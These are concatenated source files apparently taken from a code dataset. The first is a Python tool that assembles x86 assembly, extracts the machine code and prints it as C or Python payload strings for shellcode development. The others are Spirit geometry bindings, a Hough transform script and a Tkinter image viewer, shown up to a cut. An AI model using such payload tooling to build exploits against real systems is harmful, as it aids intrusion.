in other code.\n\"\"\"\n#######################################\n# Imports\n#######################################\nimport sys\nimport os\nimport argparse\nimport tempfile\nimport subprocess\nfrom shutil import copy\n\n#######################################\n# Application Constants\n#######################################\nTITLE = \"Build & Extract Payload\"\nVERSION = \"v1.0\"\n\n#######################################\n# Color Constants\n#######################################\nRED = \"\\033[31;1m\"\nGRN = \"\\033[32;1m\"\nYEL = \"\\033[33;1m\"\nBLU = \"\\033[34;1m\"\nNON = \"\\033[0m\"\n\n########################################################################\n# PRINTER FUNCTIONS\n########################################################################\ndef print_info(msg: str, end: str=\"\\n\"):\n \"\"\" Print an info message. \"\"\"\n print(f\" [{BLU}*{NON}] {msg}\", end=end)\n\ndef print_success(msg: str, end: str=\"\\n\"):\n \"\"\" Print a success message. \"\"\"\n print(f\" [{GRN}+{NON}] {msg}\", end=end)\n\ndef print_error(msg: str, end: str=\"\\n\"):\n \"\"\" Print a failure message. 
\"\"\"\n print(f\" [{RED}-{NON}] \\033[31;1mERROR:{NON} {msg}\", end=end)\n\ndef print_key_val(key: str, val: str, end: str=\"\\n\"):\n \"\"\" Print a failure message. \"\"\"\n print(f\"{YEL}{key.rjust(23)}:{NON} {val}\", end=end)\n\ndef format_bool(val: bool) -> str:\n \"\"\" Format bools for metadata output \"\"\"\n if val:\n return f\"{RED}TRUE{NON}\"\n return f\"{GRN}FALSE{NON}\"\n\ndef print_c_payload(payload: bytes, buf: str, args: argparse.Namespace):\n \"\"\" Formats the payload output for C code. \"\"\"\n fmt = \"/////////////////////////////////////////////////////\\n\"\n fmt += f\"// source file: {os.path.basename(args.src_file)}\\n\"\n fmt += f\"// payload size: {len(payload)}\\n\"\n fmt += \"/////////////////////////////////////////////////////\\n\\n\"\n fmt += \"char payload[] = \"\n i = 0\n padding = \"\"\n while i < len(buf):\n if i > 0:\n padding = \" \"\n if len(buf) - i >= 64:\n fmt += f\"{padding}\\\"{buf[i:i+64]}\\\"\\n\"\n else:\n fmt += f\"{padding}\\\"{buf[i:]}\\\"\\n\"\n i += 64\n fmt = f\"{fmt[:-1]};\\n\"\n print(fmt)\n\ndef print_python_payload(payload: bytes, buf: str, args: argparse.Namespace):\n \"\"\" Formats the payload output for python code. \"\"\"\n fmt = \"#################################################\\n\"\n fmt += f\"# source file: {os.path.basename(args.src_file)}\\n\"\n fmt += f\"# payload size: {len(payload)}\\n\"\n fmt += \"#################################################\\n\\n\"\n i = 0\n while i < len(buf):\n if i == 0:\n fmt += \"payload = \"\n else:\n fmt += \"payload += \"\n if len(buf) - i >= 64:\n fmt += f\"\\\"{buf[i:i+64]}\\\"\\n\"\n else:\n fmt += f\"\\\"{buf[i:]}\\\"\\n\"\n i += 64\n print(fmt)\n\ndef print_payload_metadata(payload: bytes):\n \"\"\" Prints additional information about the payload. \"\"\"\n contains_nulls = b\"\\x00\" in payload\n contains_tabs = b\"\\x09\" in payload\n contains_lf = b\"\\x0a\" in payload\n contains_cr = b\"\\x0d\" in payload\n contains_spaces = b\"\\x20\" in payload\n contains_signed = False\n for char in payload:\n if char >= 128:\n contains_signed = True\n break\n print(f\"\\t{YEL}--==[ Payload Metadata ]==--{NON}\\n\")\n print_key_val(\"Size\", len(payload))\n print_key_val(\"Contains Nulls\", format_bool(contains_nulls))\n print_key_val(\"Contains CR\", format_bool(contains_cr))\n print_key_val(\"Contains LF\", format_bool(contains_lf))\n print_key_val(\"Contains Spaces\", format_bool(contains_spaces))\n print_key_val(\"Contains Tabs\", format_bool(contains_tabs))\n print_key_val(\"Contains Signed Chars\", format_bool(contains_signed))\n\n print(\"\")\n\ndef print_payload_data(payload: bytes, args: argparse.Namespace):\n \"\"\"\n Pretty printer function for the payload. 
This will collect some\n basic data regarding the payload such as size and if contains nulls,\n spaces, newlines, carriage returns and prints this information before\n printing a backslash-x style hex encoded string of the payload.\n \"\"\"\n print_payload_metadata(payload)\n # Hex-encode the string.\n buf = \"\"\n for char in payload:\n buf += f\"\\\\x{char:02x}\"\n\n # Print out the payload.\n print(f\"\\t{YEL}--==[ Payload Dump ]==--{NON}\\n\")\n if args.style.lower() == \"c\":\n print_c_payload(payload, buf, args)\n elif args.style.lower() == \"python\":\n print_python_payload(payload, buf, args)\n else:\n print(buf)\n\n########################################################################\n# SANITY FUNCTIONS\n########################################################################\ndef which(binary: str) -> str:\n \"\"\"\n This function is designed to emulate the Linux which command. It\n will grab the PATH environment variable and step through each path\n and look for the target binary. If found it will ensure that it\n is marked with the execute permission. If so it will return the\n full path to that binary, otherwise it will keep search. If not\n found, None will be returned.\n \"\"\"\n for path in os.getenv('PATH').split(os.path.pathsep):\n needle = os.path.join(path, binary)\n if os.path.exists(needle) and os.access(needle, os.X_OK):\n return needle\n return \"\"\n\ndef sane_environment() -> bool:\n \"\"\"\n Performs sanity checks of the build environment and ensures we have\n the required tools.\n \"\"\"\n requirements = ['as', 'objcopy']\n for target in requirements:\n print_info(f\"Checking {YEL}{target}{NON} is installed: \", end=\"\")\n if not which(target):\n print(f\"{RED}NOT FOUND{NON}\")\n return False\n print(f\"{GRN}FOUND{NON}\")\n\n return True\n\n########################################################################\n# BUILD & EXTRACT FUNCTIONS\n########################################################################\ndef build_and_extract_payload(src_path: str) -> bytes:\n \"\"\"\n Builds the src file in the temp directory and attempts to extract\n the .text section of the binary as a raw binary array.\n \"\"\"\n # Create a temp directory.\n dirpath = tempfile.mkdtemp()\n print_info(\"Compiling and extracting payload...\")\n\n # Set some path variables for convinence.\n base_name = os.path.basename(src_path)\n src_tmp_path = os.path.join(dirpath, base_name)\n obj_tmp_path = os.path.join(dirpath, f\"{base_name[:-2]}.o\")\n payload_tmp_path = os.path.join(dirpath, \"payload.bin\")\n\n # Copy the Source code file to the directory.\n copy(src_path, dirpath)\n\n # Build the binary object using GAS.\n cmd = []\n cmd.append(which('as'))\n cmd.append('--march=i386')\n cmd.append('--32')\n cmd.append(src_tmp_path)\n cmd.append('-o')\n cmd.append(obj_tmp_path)\n\n # Check that the object file was created or abort.\n if execute_command(cmd) != 0 or not os.path.exists(obj_tmp_path):\n print_error(\"Compilation failed, object file was not created.\")\n sys.exit(4)\n\n # Use objcopy to extract the .text section of the object.\n cmd = []\n cmd.append(which('objcopy'))\n cmd.append('-j')\n cmd.append('.text')\n cmd.append('-O')\n cmd.append('binary')\n cmd.append(obj_tmp_path)\n cmd.append(payload_tmp_path)\n execute_command(cmd)\n\n # Check that the payload file was created or abort.\n if execute_command(cmd) != 0 or not os.path.exists(payload_tmp_path):\n print_error(\"Objcopy failed, payload file was not created.\")\n sys.exit(5)\n\n # open and extract the payload 
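\n    # --- Illustration (not part of the original script) -------------------------\n    # print_payload_data above renders each byte as a four-character hex escape\n    # (backslash, x, two hex digits), so the 64-character chunks emitted by\n    # print_c_payload/print_python_payload hold exactly 16 bytes per source line.\n    # For instance, a hypothetical two-byte payload 0x31 0xc0 becomes an\n    # 8-character escaped string.\n    # ----------------------------------------------------------------------------\n    # open and extract the payload 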
contents.\n with open(payload_tmp_path, 'rb') as fil:\n payload = fil.read()\n\n # Check that the payload has some sort of size or abort.\n if len(payload) == 0:\n print_error(\"Payload extraction failed, Payload was zero bytes.\")\n sys.exit(6)\n\n # otherwise, return the extracted payload.\n print_success(\"\\033[32;1mPayload extraction complete!\\033[0m\\n\")\n return payload\n\ndef execute_command(cmd: list) -> int:\n \"\"\"\n Use subprocess.Popen() to execute a command and return it's exit\n code.\n \"\"\"\n try:\n proc = subprocess.Popen(cmd)\n exitcode = proc.wait()\n except OSError:\n print_error(f\"Unable to execute build command {cmd[0]}\")\n sys.exit(3)\n return exitcode\n\ndef parse_arguments() -> argparse.Namespace:\n \"\"\" Configure argparse and get arguments. \"\"\"\n desc = \"This tool will build and extract a GAS x86 source file and \"\n desc += \"attempt to extract a raw binary copy of the .text section \"\n desc += \"of the object it compiled and print it in a formatted manner.\"\n\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('src_file', type=str,\n help='The target x86 GAS src file')\n\n desc = 'Format for output. Can be \"raw\", \"python\", or \"c\". Default is \"raw\"'\n parser.add_argument('--style', '-s', type=str, default=\"raw\",\n help=desc)\n\n # If the user provided no arguments, just print the help screen.\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n args = parser.parse_args()\n\n # check that the style argument is valid.\n if args.style.lower() not in [\"raw\", \"python\", \"c\"]:\n print_error(f\"Invalid style specified: {args.style}\\n\")\n parser.print_help()\n sys.exit(1)\n\n # Check that src file path is valid.\n if not os.path.exists(args.src_file):\n print_error(\"Invalid path to source file.\\n\")\n parser.print_help()\n sys.exit(1)\n\n print_success(\"Payload extraction complete.\")\n return args\n\ndef main():\n \"\"\" Main Application Logic. \"\"\"\n # Print a banner.\n print(f\"\\n\\t{YEL}---===[ {TITLE} {VERSION} ]===---{NON}\\n\")\n\n # Get the arguments\n args = parse_arguments()\n\n # Sanity check that the tools we need are installed on the OS.\n if not sane_environment():\n return 2\n\n # Start the extraction process.\n payload = build_and_extract_payload(args.src_file)\n\n # Print out payload and metadata.\n print_payload_data(payload, args)\n\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"utils/build_and_extract_x86_payload.py","file_name":"build_and_extract_x86_payload.py","file_ext":"py","file_size_in_byte":10552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"95594629","text":"import spirit.spiritlib as spiritlib\nimport ctypes\n\n### Load Library\n_spirit = spiritlib.LoadSpiritLibrary()\n\n### Imports\nfrom spirit.scalar import scalar\nfrom spirit import system\n\nimport numpy as np\n\n### ---------------------------------- Set ----------------------------------\n\n### Set the type of Bravais lattice. Can be e.g. 
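\n### --- Illustration (not part of the original bindings) ---\n### Every wrapper below follows the same ctypes pattern: declare argtypes and\n### restype on the shared-library symbol, then marshal Python values into C\n### types. A self-contained sketch of that pattern against libm:\n###\n###     import ctypes, ctypes.util\n###     libm = ctypes.CDLL(ctypes.util.find_library('m'))\n###     libm.pow.argtypes = [ctypes.c_double, ctypes.c_double]\n###     libm.pow.restype = ctypes.c_double\n###     libm.pow(2.0, 10.0)  # -> 1024.0\n###\n### Fixed-size buffers such as (3*ctypes.c_float)() serve as out-parameters,\n### which is how the Get_* functions below return vectors.\n### ---------------------------------------------------------\n\n### Set the type of Bravais lattice. Can be e.g. 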
\"sc\" or \"bcc\"\n_Set_Bravais_Lattice = _spirit.Geometry_Set_Bravais_Lattice\n_Set_Bravais_Lattice.argtypes = [ctypes.c_void_p, ctypes.c_char_p]\n_Set_Bravais_Lattice.restype = None\ndef setBravaisLattice(p_state, lattice, idx_image=-1, idx_chain=-1):\n _Set_Bravais_Lattice(ctypes.c_void_p(p_state), ctypes.c_char_p(lattice.encode('utf-8')))\n\n### Set number of cells in bravais lattice directions a, b, c\n_Set_N_Cells = _spirit.Geometry_Set_N_Cells\n_Set_N_Cells.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_int)]\n_Set_N_Cells.restype = None\ndef setNCells(p_state, n_cells=[1, 1, 1], idx_image=-1, idx_chain=-1):\n vec3 = ctypes.c_int * 3\n _Set_N_Cells(ctypes.c_void_p(p_state), vec3(*n_cells))\n\n### Set the types of the atoms in a basis cell\n_Set_Cell_Atom_Types = _spirit.Geometry_Set_Cell_Atom_Types\n_Set_Cell_Atom_Types.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.POINTER(ctypes.c_float)]\n_Set_Cell_Atom_Types.restype = None\ndef setCellAtomTypes(p_state, atom_types, idx_image=-1, idx_chain=-1):\n n = len(atom_types)\n vec = ctypes.c_int * n\n _Set_Cell_Atom_Types(ctypes.c_void_p(p_state), ctypes.c_int(n), vec(*atom_types))\n\n### Set the bravais vectors\n_Set_Bravais_Vectors = _spirit.Geometry_Set_Bravais_Vectors\n_Set_Bravais_Vectors.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_float),\n ctypes.POINTER(ctypes.c_float), ctypes.POINTER(ctypes.c_float)]\n_Set_Bravais_Vectors.restype = None\ndef setBravaisVectors(p_state, ta=[1.0, 0.0, 0.0], tb=[0.0, 1.0, 0.0], tc=[0.0, 0.0, 1.0], idx_image=-1, idx_chain=-1):\n vec3 = ctypes.c_float * 3\n _Set_Bravais_Vectors(ctypes.c_void_p(p_state), vec3(ta), vec3(tb), vec3(tc))\n\n### Set the overall lattice constant\n_Set_Lattice_Constant = _spirit.Geometry_Set_Lattice_Constant\n_Set_Lattice_Constant.argtypes = [ctypes.c_void_p, ctypes.c_float]\n_Set_Lattice_Constant.restype = None\ndef setLatticeConstant(p_state, lattice_constant, idx_image=-1, idx_chain=-1):\n _Set_Lattice_Constant(p_state, ctypes.c_float(lattice_constant))\n\n### ---------------------------------- Get ----------------------------------\n\n### Get Bounds\n_Get_Bounds = _spirit.Geometry_Get_Bounds\n_Get_Bounds.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_float), \n ctypes.POINTER(ctypes.c_float), ctypes.c_int, ctypes.c_int]\n_Get_Bounds.restype = None\ndef Get_Bounds(p_state, idx_image=-1, idx_chain=-1):\n _min = (3*ctypes.c_float)()\n _max = (3*ctypes.c_float)()\n _Get_Bounds(ctypes.c_void_p(p_state), _min, _max, \n ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n return [_min[i] for i in range(3)], [_max[i] for i in range(3)] \n\n### Get Center\n_Get_Center = _spirit.Geometry_Get_Center\n_Get_Center.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_float), ctypes.c_int, ctypes.c_int]\n_Get_Center.restype = None\ndef Get_Center(p_state, idx_image=-1, idx_chain=-1):\n _center = (3*ctypes.c_float)()\n _Get_Center(ctypes.c_void_p(p_state), _center, ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n return [_center[i] for i in range(3)]\n\n### Get Bravais lattice type\n_Get_Bravais_Type = _spirit.Geometry_Get_Bravais_Type\n_Get_Bravais_Type.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]\n_Get_Bravais_Type.restype = ctypes.c_int\ndef Get_Bravais_Type(p_state, idx_image=-1, idx_chain=-1):\n return int(_Get_Bravais_Type(ctypes.c_void_p(p_state), ctypes.c_int(idx_image), \n ctypes.c_int(idx_chain)))\n\n### Get Bravais vectors\n_Get_Bravais_Vectors = _spirit.Geometry_Get_Bravais_Vectors\n_Get_Bravais_Vectors.argtypes = [ctypes.c_void_p, 
ctypes.POINTER(ctypes.c_float), \n ctypes.POINTER(ctypes.c_float), ctypes.POINTER(ctypes.c_float), \n ctypes.c_int, ctypes.c_int]\n_Get_Bravais_Vectors.restype = None\ndef Get_Bravais_Vectors(p_state, idx_image=-1, idx_chain=-1):\n _a = (3*ctypes.c_float)()\n _b = (3*ctypes.c_float)()\n _c = (3*ctypes.c_float)()\n _Get_Bravais_Vectors(ctypes.c_void_p(p_state), _a, _b, _c, \n ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n return [a for a in _a], [b for b in _b], [c for c in _c]\n \n### Get N Cells\n_Get_N_Cells = _spirit.Geometry_Get_N_Cells\n_Get_N_Cells.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_int), ctypes.c_int, ctypes.c_int]\n_Get_N_Cells.restype = None\ndef Get_N_Cells(p_state, idx_image=-1, idx_chain=-1):\n n_cells = (3*ctypes.c_int)()\n _Get_N_Cells(ctypes.c_void_p(p_state), n_cells, ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n return [n for n in n_cells]\n\n### Get Translation Vectors\n_Get_Translation_Vectors = _spirit.Geometry_Get_Translation_Vectors\n_Get_Translation_Vectors.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_float), \n ctypes.POINTER(ctypes.c_float), ctypes.POINTER(ctypes.c_float), \n ctypes.c_int, ctypes.c_int]\n_Get_Translation_Vectors.restype = None\ndef Get_Translation_Vectors(p_state, idx_image=-1, idx_chain=-1):\n ta = (3*ctypes.c_float)()\n tb = (3*ctypes.c_float)()\n tc = (3*ctypes.c_float)()\n _Get_Translation_Vectors(ctypes.c_void_p(p_state), ta, tb, tc, \n ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n return [a for a in ta], [b for b in tb], [c for c in tc]\n\n### Get Translation Vectors\n_Get_Dimensionality = _spirit.Geometry_Get_Dimensionality\n_Get_Dimensionality.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]\n_Get_Dimensionality.restype = ctypes.c_int\ndef Get_Dimensionality(p_state, idx_image=-1, idx_chain=-1):\n return int(_Get_Dimensionality(ctypes.c_void_p(p_state), ctypes.c_int(idx_image), \n ctypes.c_int(idx_chain)))\n\n### Get Pointer to Spin Positions\n# NOTE: Changing the values of the array_view one can alter the value of the data of the state\n_Get_Positions = _spirit.Geometry_Get_Positions\n_Get_Positions.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]\n_Get_Positions.restype = ctypes.POINTER(scalar)\ndef Get_Positions(p_state, idx_image=-1, idx_chain=-1):\n nos = system.Get_NOS(p_state, idx_image, idx_chain)\n ArrayType = scalar*3*nos\n Data = _Get_Positions(ctypes.c_void_p(p_state), \n ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n array_pointer = ctypes.cast(Data, ctypes.POINTER(ArrayType))\n array = np.frombuffer(array_pointer.contents, dtype=scalar)\n array_view = array.view()\n array_view.shape = (nos, 3)\n return array_view\n\n### Get Pointer to atom types\n# NOTE: Changing the values of the array_view one can alter the value of the data of the state\n_Get_Atom_Types = _spirit.Geometry_Get_Atom_Types\n_Get_Atom_Types.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_int]\n_Get_Atom_Types.restype = ctypes.POINTER(ctypes.c_int)\ndef Get_Atom_Types(p_state, idx_image=-1, idx_chain=-1):\n nos = system.Get_NOS(p_state, idx_image, idx_chain)\n ArrayType = ctypes.c_int*nos\n Data = _Get_Atom_Types(ctypes.c_void_p(p_state), \n ctypes.c_int(idx_image), ctypes.c_int(idx_chain))\n array_pointer = ctypes.cast(Data, ctypes.POINTER(ArrayType))\n array = np.frombuffer(array_pointer.contents, dtype=ctypes.c_int)\n array_view = array.view()\n return 
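Two observations on the geometry bindings above. First, setBravaisVectors builds vec3 = ctypes.c_float * 3 but then calls vec3(ta) on a Python list, which raises TypeError; the list must be unpacked, as setNCells already does with vec3(*n_cells). A hedged one-line fix for that call:

_Set_Bravais_Vectors(ctypes.c_void_p(p_state), vec3(*ta), vec3(*tb), vec3(*tc))

(setLatticeConstant also passes p_state without the ctypes.c_void_p wrapper used elsewhere; ctypes accepts an integer for a c_void_p argtype, so that one is only an inconsistency.) Second, Get_Positions maps C memory into NumPy without copying; the cast-and-frombuffer idiom in isolation, with c_float standing in for Spirit's scalar type:

import ctypes
import numpy as np

buf = (ctypes.c_float * 6)(0, 1, 2, 3, 4, 5)           # stand-in for the C array
ptr = ctypes.cast(buf, ctypes.POINTER(ctypes.c_float * 6))
view = np.frombuffer(ptr.contents, dtype=np.float32).reshape(2, 3)
view[0, 0] = 42.0                                      # writes through to buf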
array_view","sub_path":"core/python/spirit/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"402530985","text":"\n\n#calss header\nclass _DUCTILE():\n\tdef __init__(self,): \n\t\tself.name = \"DUCTILE\"\n\t\tself.definitions = [u'A ductile metal can be bent easily.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_ductile.py","file_name":"_ductile.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"114375725","text":"import numpy as np\nimport cv2\n\n\ndef buildRefTable(img):\n table = [[0 for x in range(1)] for y in range(90)] # creating a empty list\n img_center = [img.shape[0]/2, img.shape[1]/2] # r will be calculated corresponding to this point\n\n filter_size = 3\n for x in range(img.shape[0]-(filter_size-1)):\n for y in range(img.shape[1]-(filter_size-1)):\n if img[x,y] != 0:\n theta, r = findAngleDistance(x,y,img_center)\n if r != 0:\n table[np.absolute(theta)].append(r)\n\n for i in range(len(table)): table[i].pop(0)\n return table\n\n\ndef findAngleDistance(x1,y1,img_center):\n x2, y2 = img_center[0], img_center[1]\n r = [(x2-x1),(y2-y1)]\n if (x2-x1 != 0):\n return [int(np.rad2deg(np.arctan((y2-y1)/(x2-x1)))), r]\n else:\n return [0,0]\n\n\ndef findMaxima(acc):\n\n ridx,cidx = np.unravel_index(acc.argmax(),acc.shape)\n return [acc[ridx,cidx],ridx,cidx]\n\n\ndef matchTable(im, table):\n\n m, n = im.shape\n acc = np.zeros((m+50,n+50)) # Extra space as voted points for shapes can be outside the image\n\n def findGradient(x,y):\n if (x != 0):\n return int(np.rad2deg(np.arctan(y/x)))\n else:\n return 0\n\n for x in range(1,im.shape[0]):\n for y in range(im.shape[1]):\n\n if im[x,y] != 0: # boundary point\n theta = findGradient(x,y)\n vectors = table[theta]\n for vector in vectors:\n acc[vector[0]+x, vector[1]+y]+=1\n return acc\n\ndef main(template_names,actual_image_name):\n\n im = cv2.imread(actual_image_name,0)\n for img in template_names:\n refim = cv2.imread(img,0)\n\n table = buildRefTable(refim)\n acc = matchTable(im, table)\n val, ridx, cidx = findMaxima(acc)\n\n\n # code for drawing bounding-box in original image at the found location\n\n # find the half-width and height of template\n hheight = np.floor(refim.shape[0] / 2) + 1\n hwidth = np.floor(refim.shape[1] / 2) + 1\n\n # find coordinates of the box\n rstart = int(max(ridx - hheight, 1))\n rend = int(min(ridx + hheight, im.shape[0] - 1))\n cstart = int(max(cidx - hwidth, 1))\n cend = int(min(cidx + hwidth, im.shape[1] - 1))\n\n # draw the box\n im[rstart:rend, cstart] = 255\n im[rstart:rend, cend] = 255\n\n im[rstart, cstart:cend] = 255\n im[rend, cstart:cend] = 255\n\n # show the image\n cv2.imshow(\"Reference Image\",refim)\n cv2.imshow(\"Image\",im)\n\n\nif __name__ == '__main__':\n template_images = ['./GHT/templates/Input1Ref.png', './GHT/templates/Input2Ref.png']\n search_in = './GHT/actual/Input1.png'\n main(template_images,search_in)\n 
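findMaxima in the generalized-Hough record above uses the standard flatten-then-unravel idiom to recover 2-D peak coordinates from the accumulator; in isolation:

import numpy as np

acc = np.zeros((5, 5))
acc[3, 1] = 7                        # pretend this cell collected the most votes
ridx, cidx = np.unravel_index(acc.argmax(), acc.shape)
print(acc[ridx, cidx], ridx, cidx)   # 7.0 3 1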
cv2.waitKey()\n","sub_path":"ght.py","file_name":"ght.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"485519882","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"The image-viewer for Quiver.\"\"\"\n\nimport tkinter as tk\nfrom tkinter import ttk\nimport idlelib.ToolTip\nimport os\n\nimport pkinter as pk\nfrom PIL import Image, ImageTk\n\nimport load_images\n\n__title__ = \"Painting\"\n__author__ = \"DeflatedPickle\"\n__version__ = \"1.11.1\"\n\n\nclass ImageViewer(tk.Toplevel):\n def __init__(self, parent, *args, **kwargs):\n tk.Toplevel.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n self.title(\"Painting\")\n self.geometry(\"500x400\")\n self.minsize(width=300, height=200)\n self.maxsize(width=1000, height=800)\n # self.transient(parent)\n self.rowconfigure(1, weight=1)\n self.columnconfigure(0, weight=1)\n\n self.image_open = None\n self.image_photo = None\n self.drawn_image = None\n\n self.original_width = 0\n self.original_height = 0\n\n self.zoom_width = 0\n self.zoom_height = 0\n\n self.zoom_speed = 16\n self.zoom_current = 1\n\n self.scroll_past_horizontally = 50\n self.scroll_past_vertically = 50\n\n self.menu = Menu(self)\n\n self.toolbar = Toolbar(self)\n self.toolbar.grid(row=0, column=0, sticky=\"we\")\n\n self.statusbar = Statusbar(self)\n self.statusbar.grid(row=2, column=0, sticky=\"we\")\n\n ##################################################\n\n self.widget_frame_image = ttk.Frame(self)\n self.widget_frame_image.grid(row=1, column=0, sticky=\"nesw\")\n self.widget_frame_image.rowconfigure(0, weight=1)\n self.widget_frame_image.columnconfigure(0, weight=1)\n self.widget_frame_image.bind_all(\"\", self.zoom_handler)\n self.widget_frame_image.bind_all(\"\", self.zoom_handler)\n self.widget_frame_image.bind_all(\"\", self.zoom_handler)\n self.widget_frame_image.bind_all(\"\", self.on_enter)\n self.widget_frame_image.bind_all(\"\", self.on_leave)\n\n self.widget_canvas_image = tk.Canvas(self.widget_frame_image)\n self.widget_canvas_image.grid(row=0, column=0)\n\n self.widget_scrollbar_horizontal = ttk.Scrollbar(self.widget_frame_image, orient=\"horizontal\",\n command=self.widget_canvas_image.xview)\n self.widget_scrollbar_horizontal.grid(row=1, column=0, sticky=\"we\")\n\n self.widget_scrollbar_vertical = ttk.Scrollbar(self.widget_frame_image, orient=\"vertical\",\n command=self.widget_canvas_image.yview)\n self.widget_scrollbar_vertical.grid(row=0, column=1, sticky=\"ns\")\n\n self.widget_canvas_image.configure(xscrollcommand=self.widget_scrollbar_horizontal.set,\n yscrollcommand=self.widget_scrollbar_vertical.set)\n\n self.check_zoom()\n\n def zoom_handler(self, event):\n if event.delta == 120 or event.num == 4:\n if self.zoom_current < 16:\n self.zoom_in()\n\n elif event.delta == -120:\n if self.zoom_current > 1 or event.num == 5:\n self.zoom_out()\n\n def load_image(self, image=\"\"):\n self.widget_canvas_image.delete(\"all\")\n\n self.image_open = Image.open(image, \"r\")\n self.image_photo = ImageTk.PhotoImage(self.image_open)\n\n self.original_width = self.image_photo.width()\n self.original_height = self.image_photo.height()\n\n self.widget_canvas_image.configure(scrollregion=(0, 0, self.image_photo.width(), self.image_photo.height()))\n self.widget_canvas_image.configure(width=self.image_photo.width(), height=self.image_photo.height())\n self.drawn_image = self.widget_canvas_image.create_image(0, 0, anchor=\"nw\", 
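zoom_handler in the image-viewer record folds together the Windows wheel convention (event.delta of +/-120) and the X11 convention (Button-4/Button-5 with delta 0), though the event.num == 5 test ends up inside the zoom-bound check rather than next to its delta test. A hedged restatement of the intended dispatch:

def on_wheel(event):
    # Windows/macOS deliver event.delta; X11 delivers Button-4/5 with delta == 0.
    if event.delta > 0 or event.num == 4:
        zoom_in()
    elif event.delta < 0 or event.num == 5:
        zoom_out()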
image=self.image_photo,\n tags=\"image\")\n self.title(\"{} - {}\".format(self.title(), \"\".join(os.path.splitext(image))))\n\n self.check_tile_buttons()\n self.draw_background()\n\n def draw_background(self):\n self.widget_canvas_image.delete(\"chessboard\")\n self.widget_canvas_image.delete(\"grid\")\n\n if self.toolbar.variable_chessboard.get():\n colour1 = \"white\"\n colour2 = \"light grey\"\n colour = colour2\n for row in range(self.original_height - (16 - self.zoom_current) + 1):\n colour = colour1 if colour == colour2 else colour2\n for col in range(self.original_width - (16 - self.zoom_current) + 1):\n # print(self.zoom_current)\n x1 = (col * 16)\n y1 = (row * 16)\n x2 = x1 + 16\n y2 = y1 + 16\n self.widget_canvas_image.create_rectangle(x1, y1, x2, y2, outline=colour, fill=colour,\n tags=\"chessboard\")\n colour = colour1 if colour == colour2 else colour2\n\n # self.widget_canvas_image.lift(self.drawn_image)\n self.widget_canvas_image.lift(\"image\")\n\n if self.toolbar.variable_grid.get():\n colour3 = \"light grey\"\n for row in range(self.original_height - (16 - self.zoom_current) + 1):\n colour = colour3\n for col in range(self.original_width - (16 - self.zoom_current) + 1):\n # print(self.zoom_current)\n x1 = (col * 16)\n y1 = (row * 16)\n x2 = x1 + 16\n y2 = y1 + 16\n self.widget_canvas_image.create_rectangle(x1, y1, x2, y2, outline=colour, fill=None, tags=\"grid\")\n colour = colour\n\n def zoom_in(self):\n self.widget_canvas_image.delete(\"image\")\n\n self.image_photo = ImageTk.PhotoImage(self.image_open.resize(\n (self.image_photo.width() + self.original_width, self.image_photo.height() + self.original_height)))\n self.widget_canvas_image.configure(scrollregion=(self.check_scrollregion()))\n self.widget_canvas_image.configure(width=self.check_size()[0], height=self.check_size()[1])\n # self.drawn_image = self.widget_canvas_image.create_image(0, 0, anchor=\"nw\", image=self.image_photo, tags=\"image\")\n\n self.zoom_current += 1\n # print(self.zoom_current)\n\n self.zoom_width = self.image_photo.width()\n self.zoom_height = self.image_photo.height()\n\n self.draw_tiles()\n self.draw_background()\n self.check_zoom()\n\n def zoom_out(self):\n self.widget_canvas_image.delete(\"image\")\n\n self.image_photo = ImageTk.PhotoImage(self.image_open.resize(\n (self.image_photo.width() - self.original_width, self.image_photo.height() - self.original_height)))\n self.widget_canvas_image.configure(scrollregion=(self.check_scrollregion()))\n self.widget_canvas_image.configure(width=self.check_size()[0], height=self.check_size()[1])\n # self.drawn_image = self.widget_canvas_image.create_image(0, 0, anchor=\"nw\", image=self.image_photo, tags=\"image\")\n\n self.zoom_current -= 1\n # print(self.zoom_current)\n\n self.zoom_width = self.image_photo.width()\n self.zoom_height = self.image_photo.height()\n\n self.draw_tiles()\n self.draw_background()\n self.check_zoom()\n\n def check_scrollregion(self):\n if self.toolbar.variable_tile.get():\n return 0, 0, self.image_photo.width() * 3, self.image_photo.height() * 3\n\n else:\n return 0, 0, self.image_photo.width(), self.image_photo.height()\n\n def check_size(self):\n if self.toolbar.variable_tile.get():\n return self.image_photo.width() * 3, self.image_photo.height() * 3\n\n else:\n return self.image_photo.width(), self.image_photo.height()\n\n def check_zoom(self):\n if self.zoom_current > 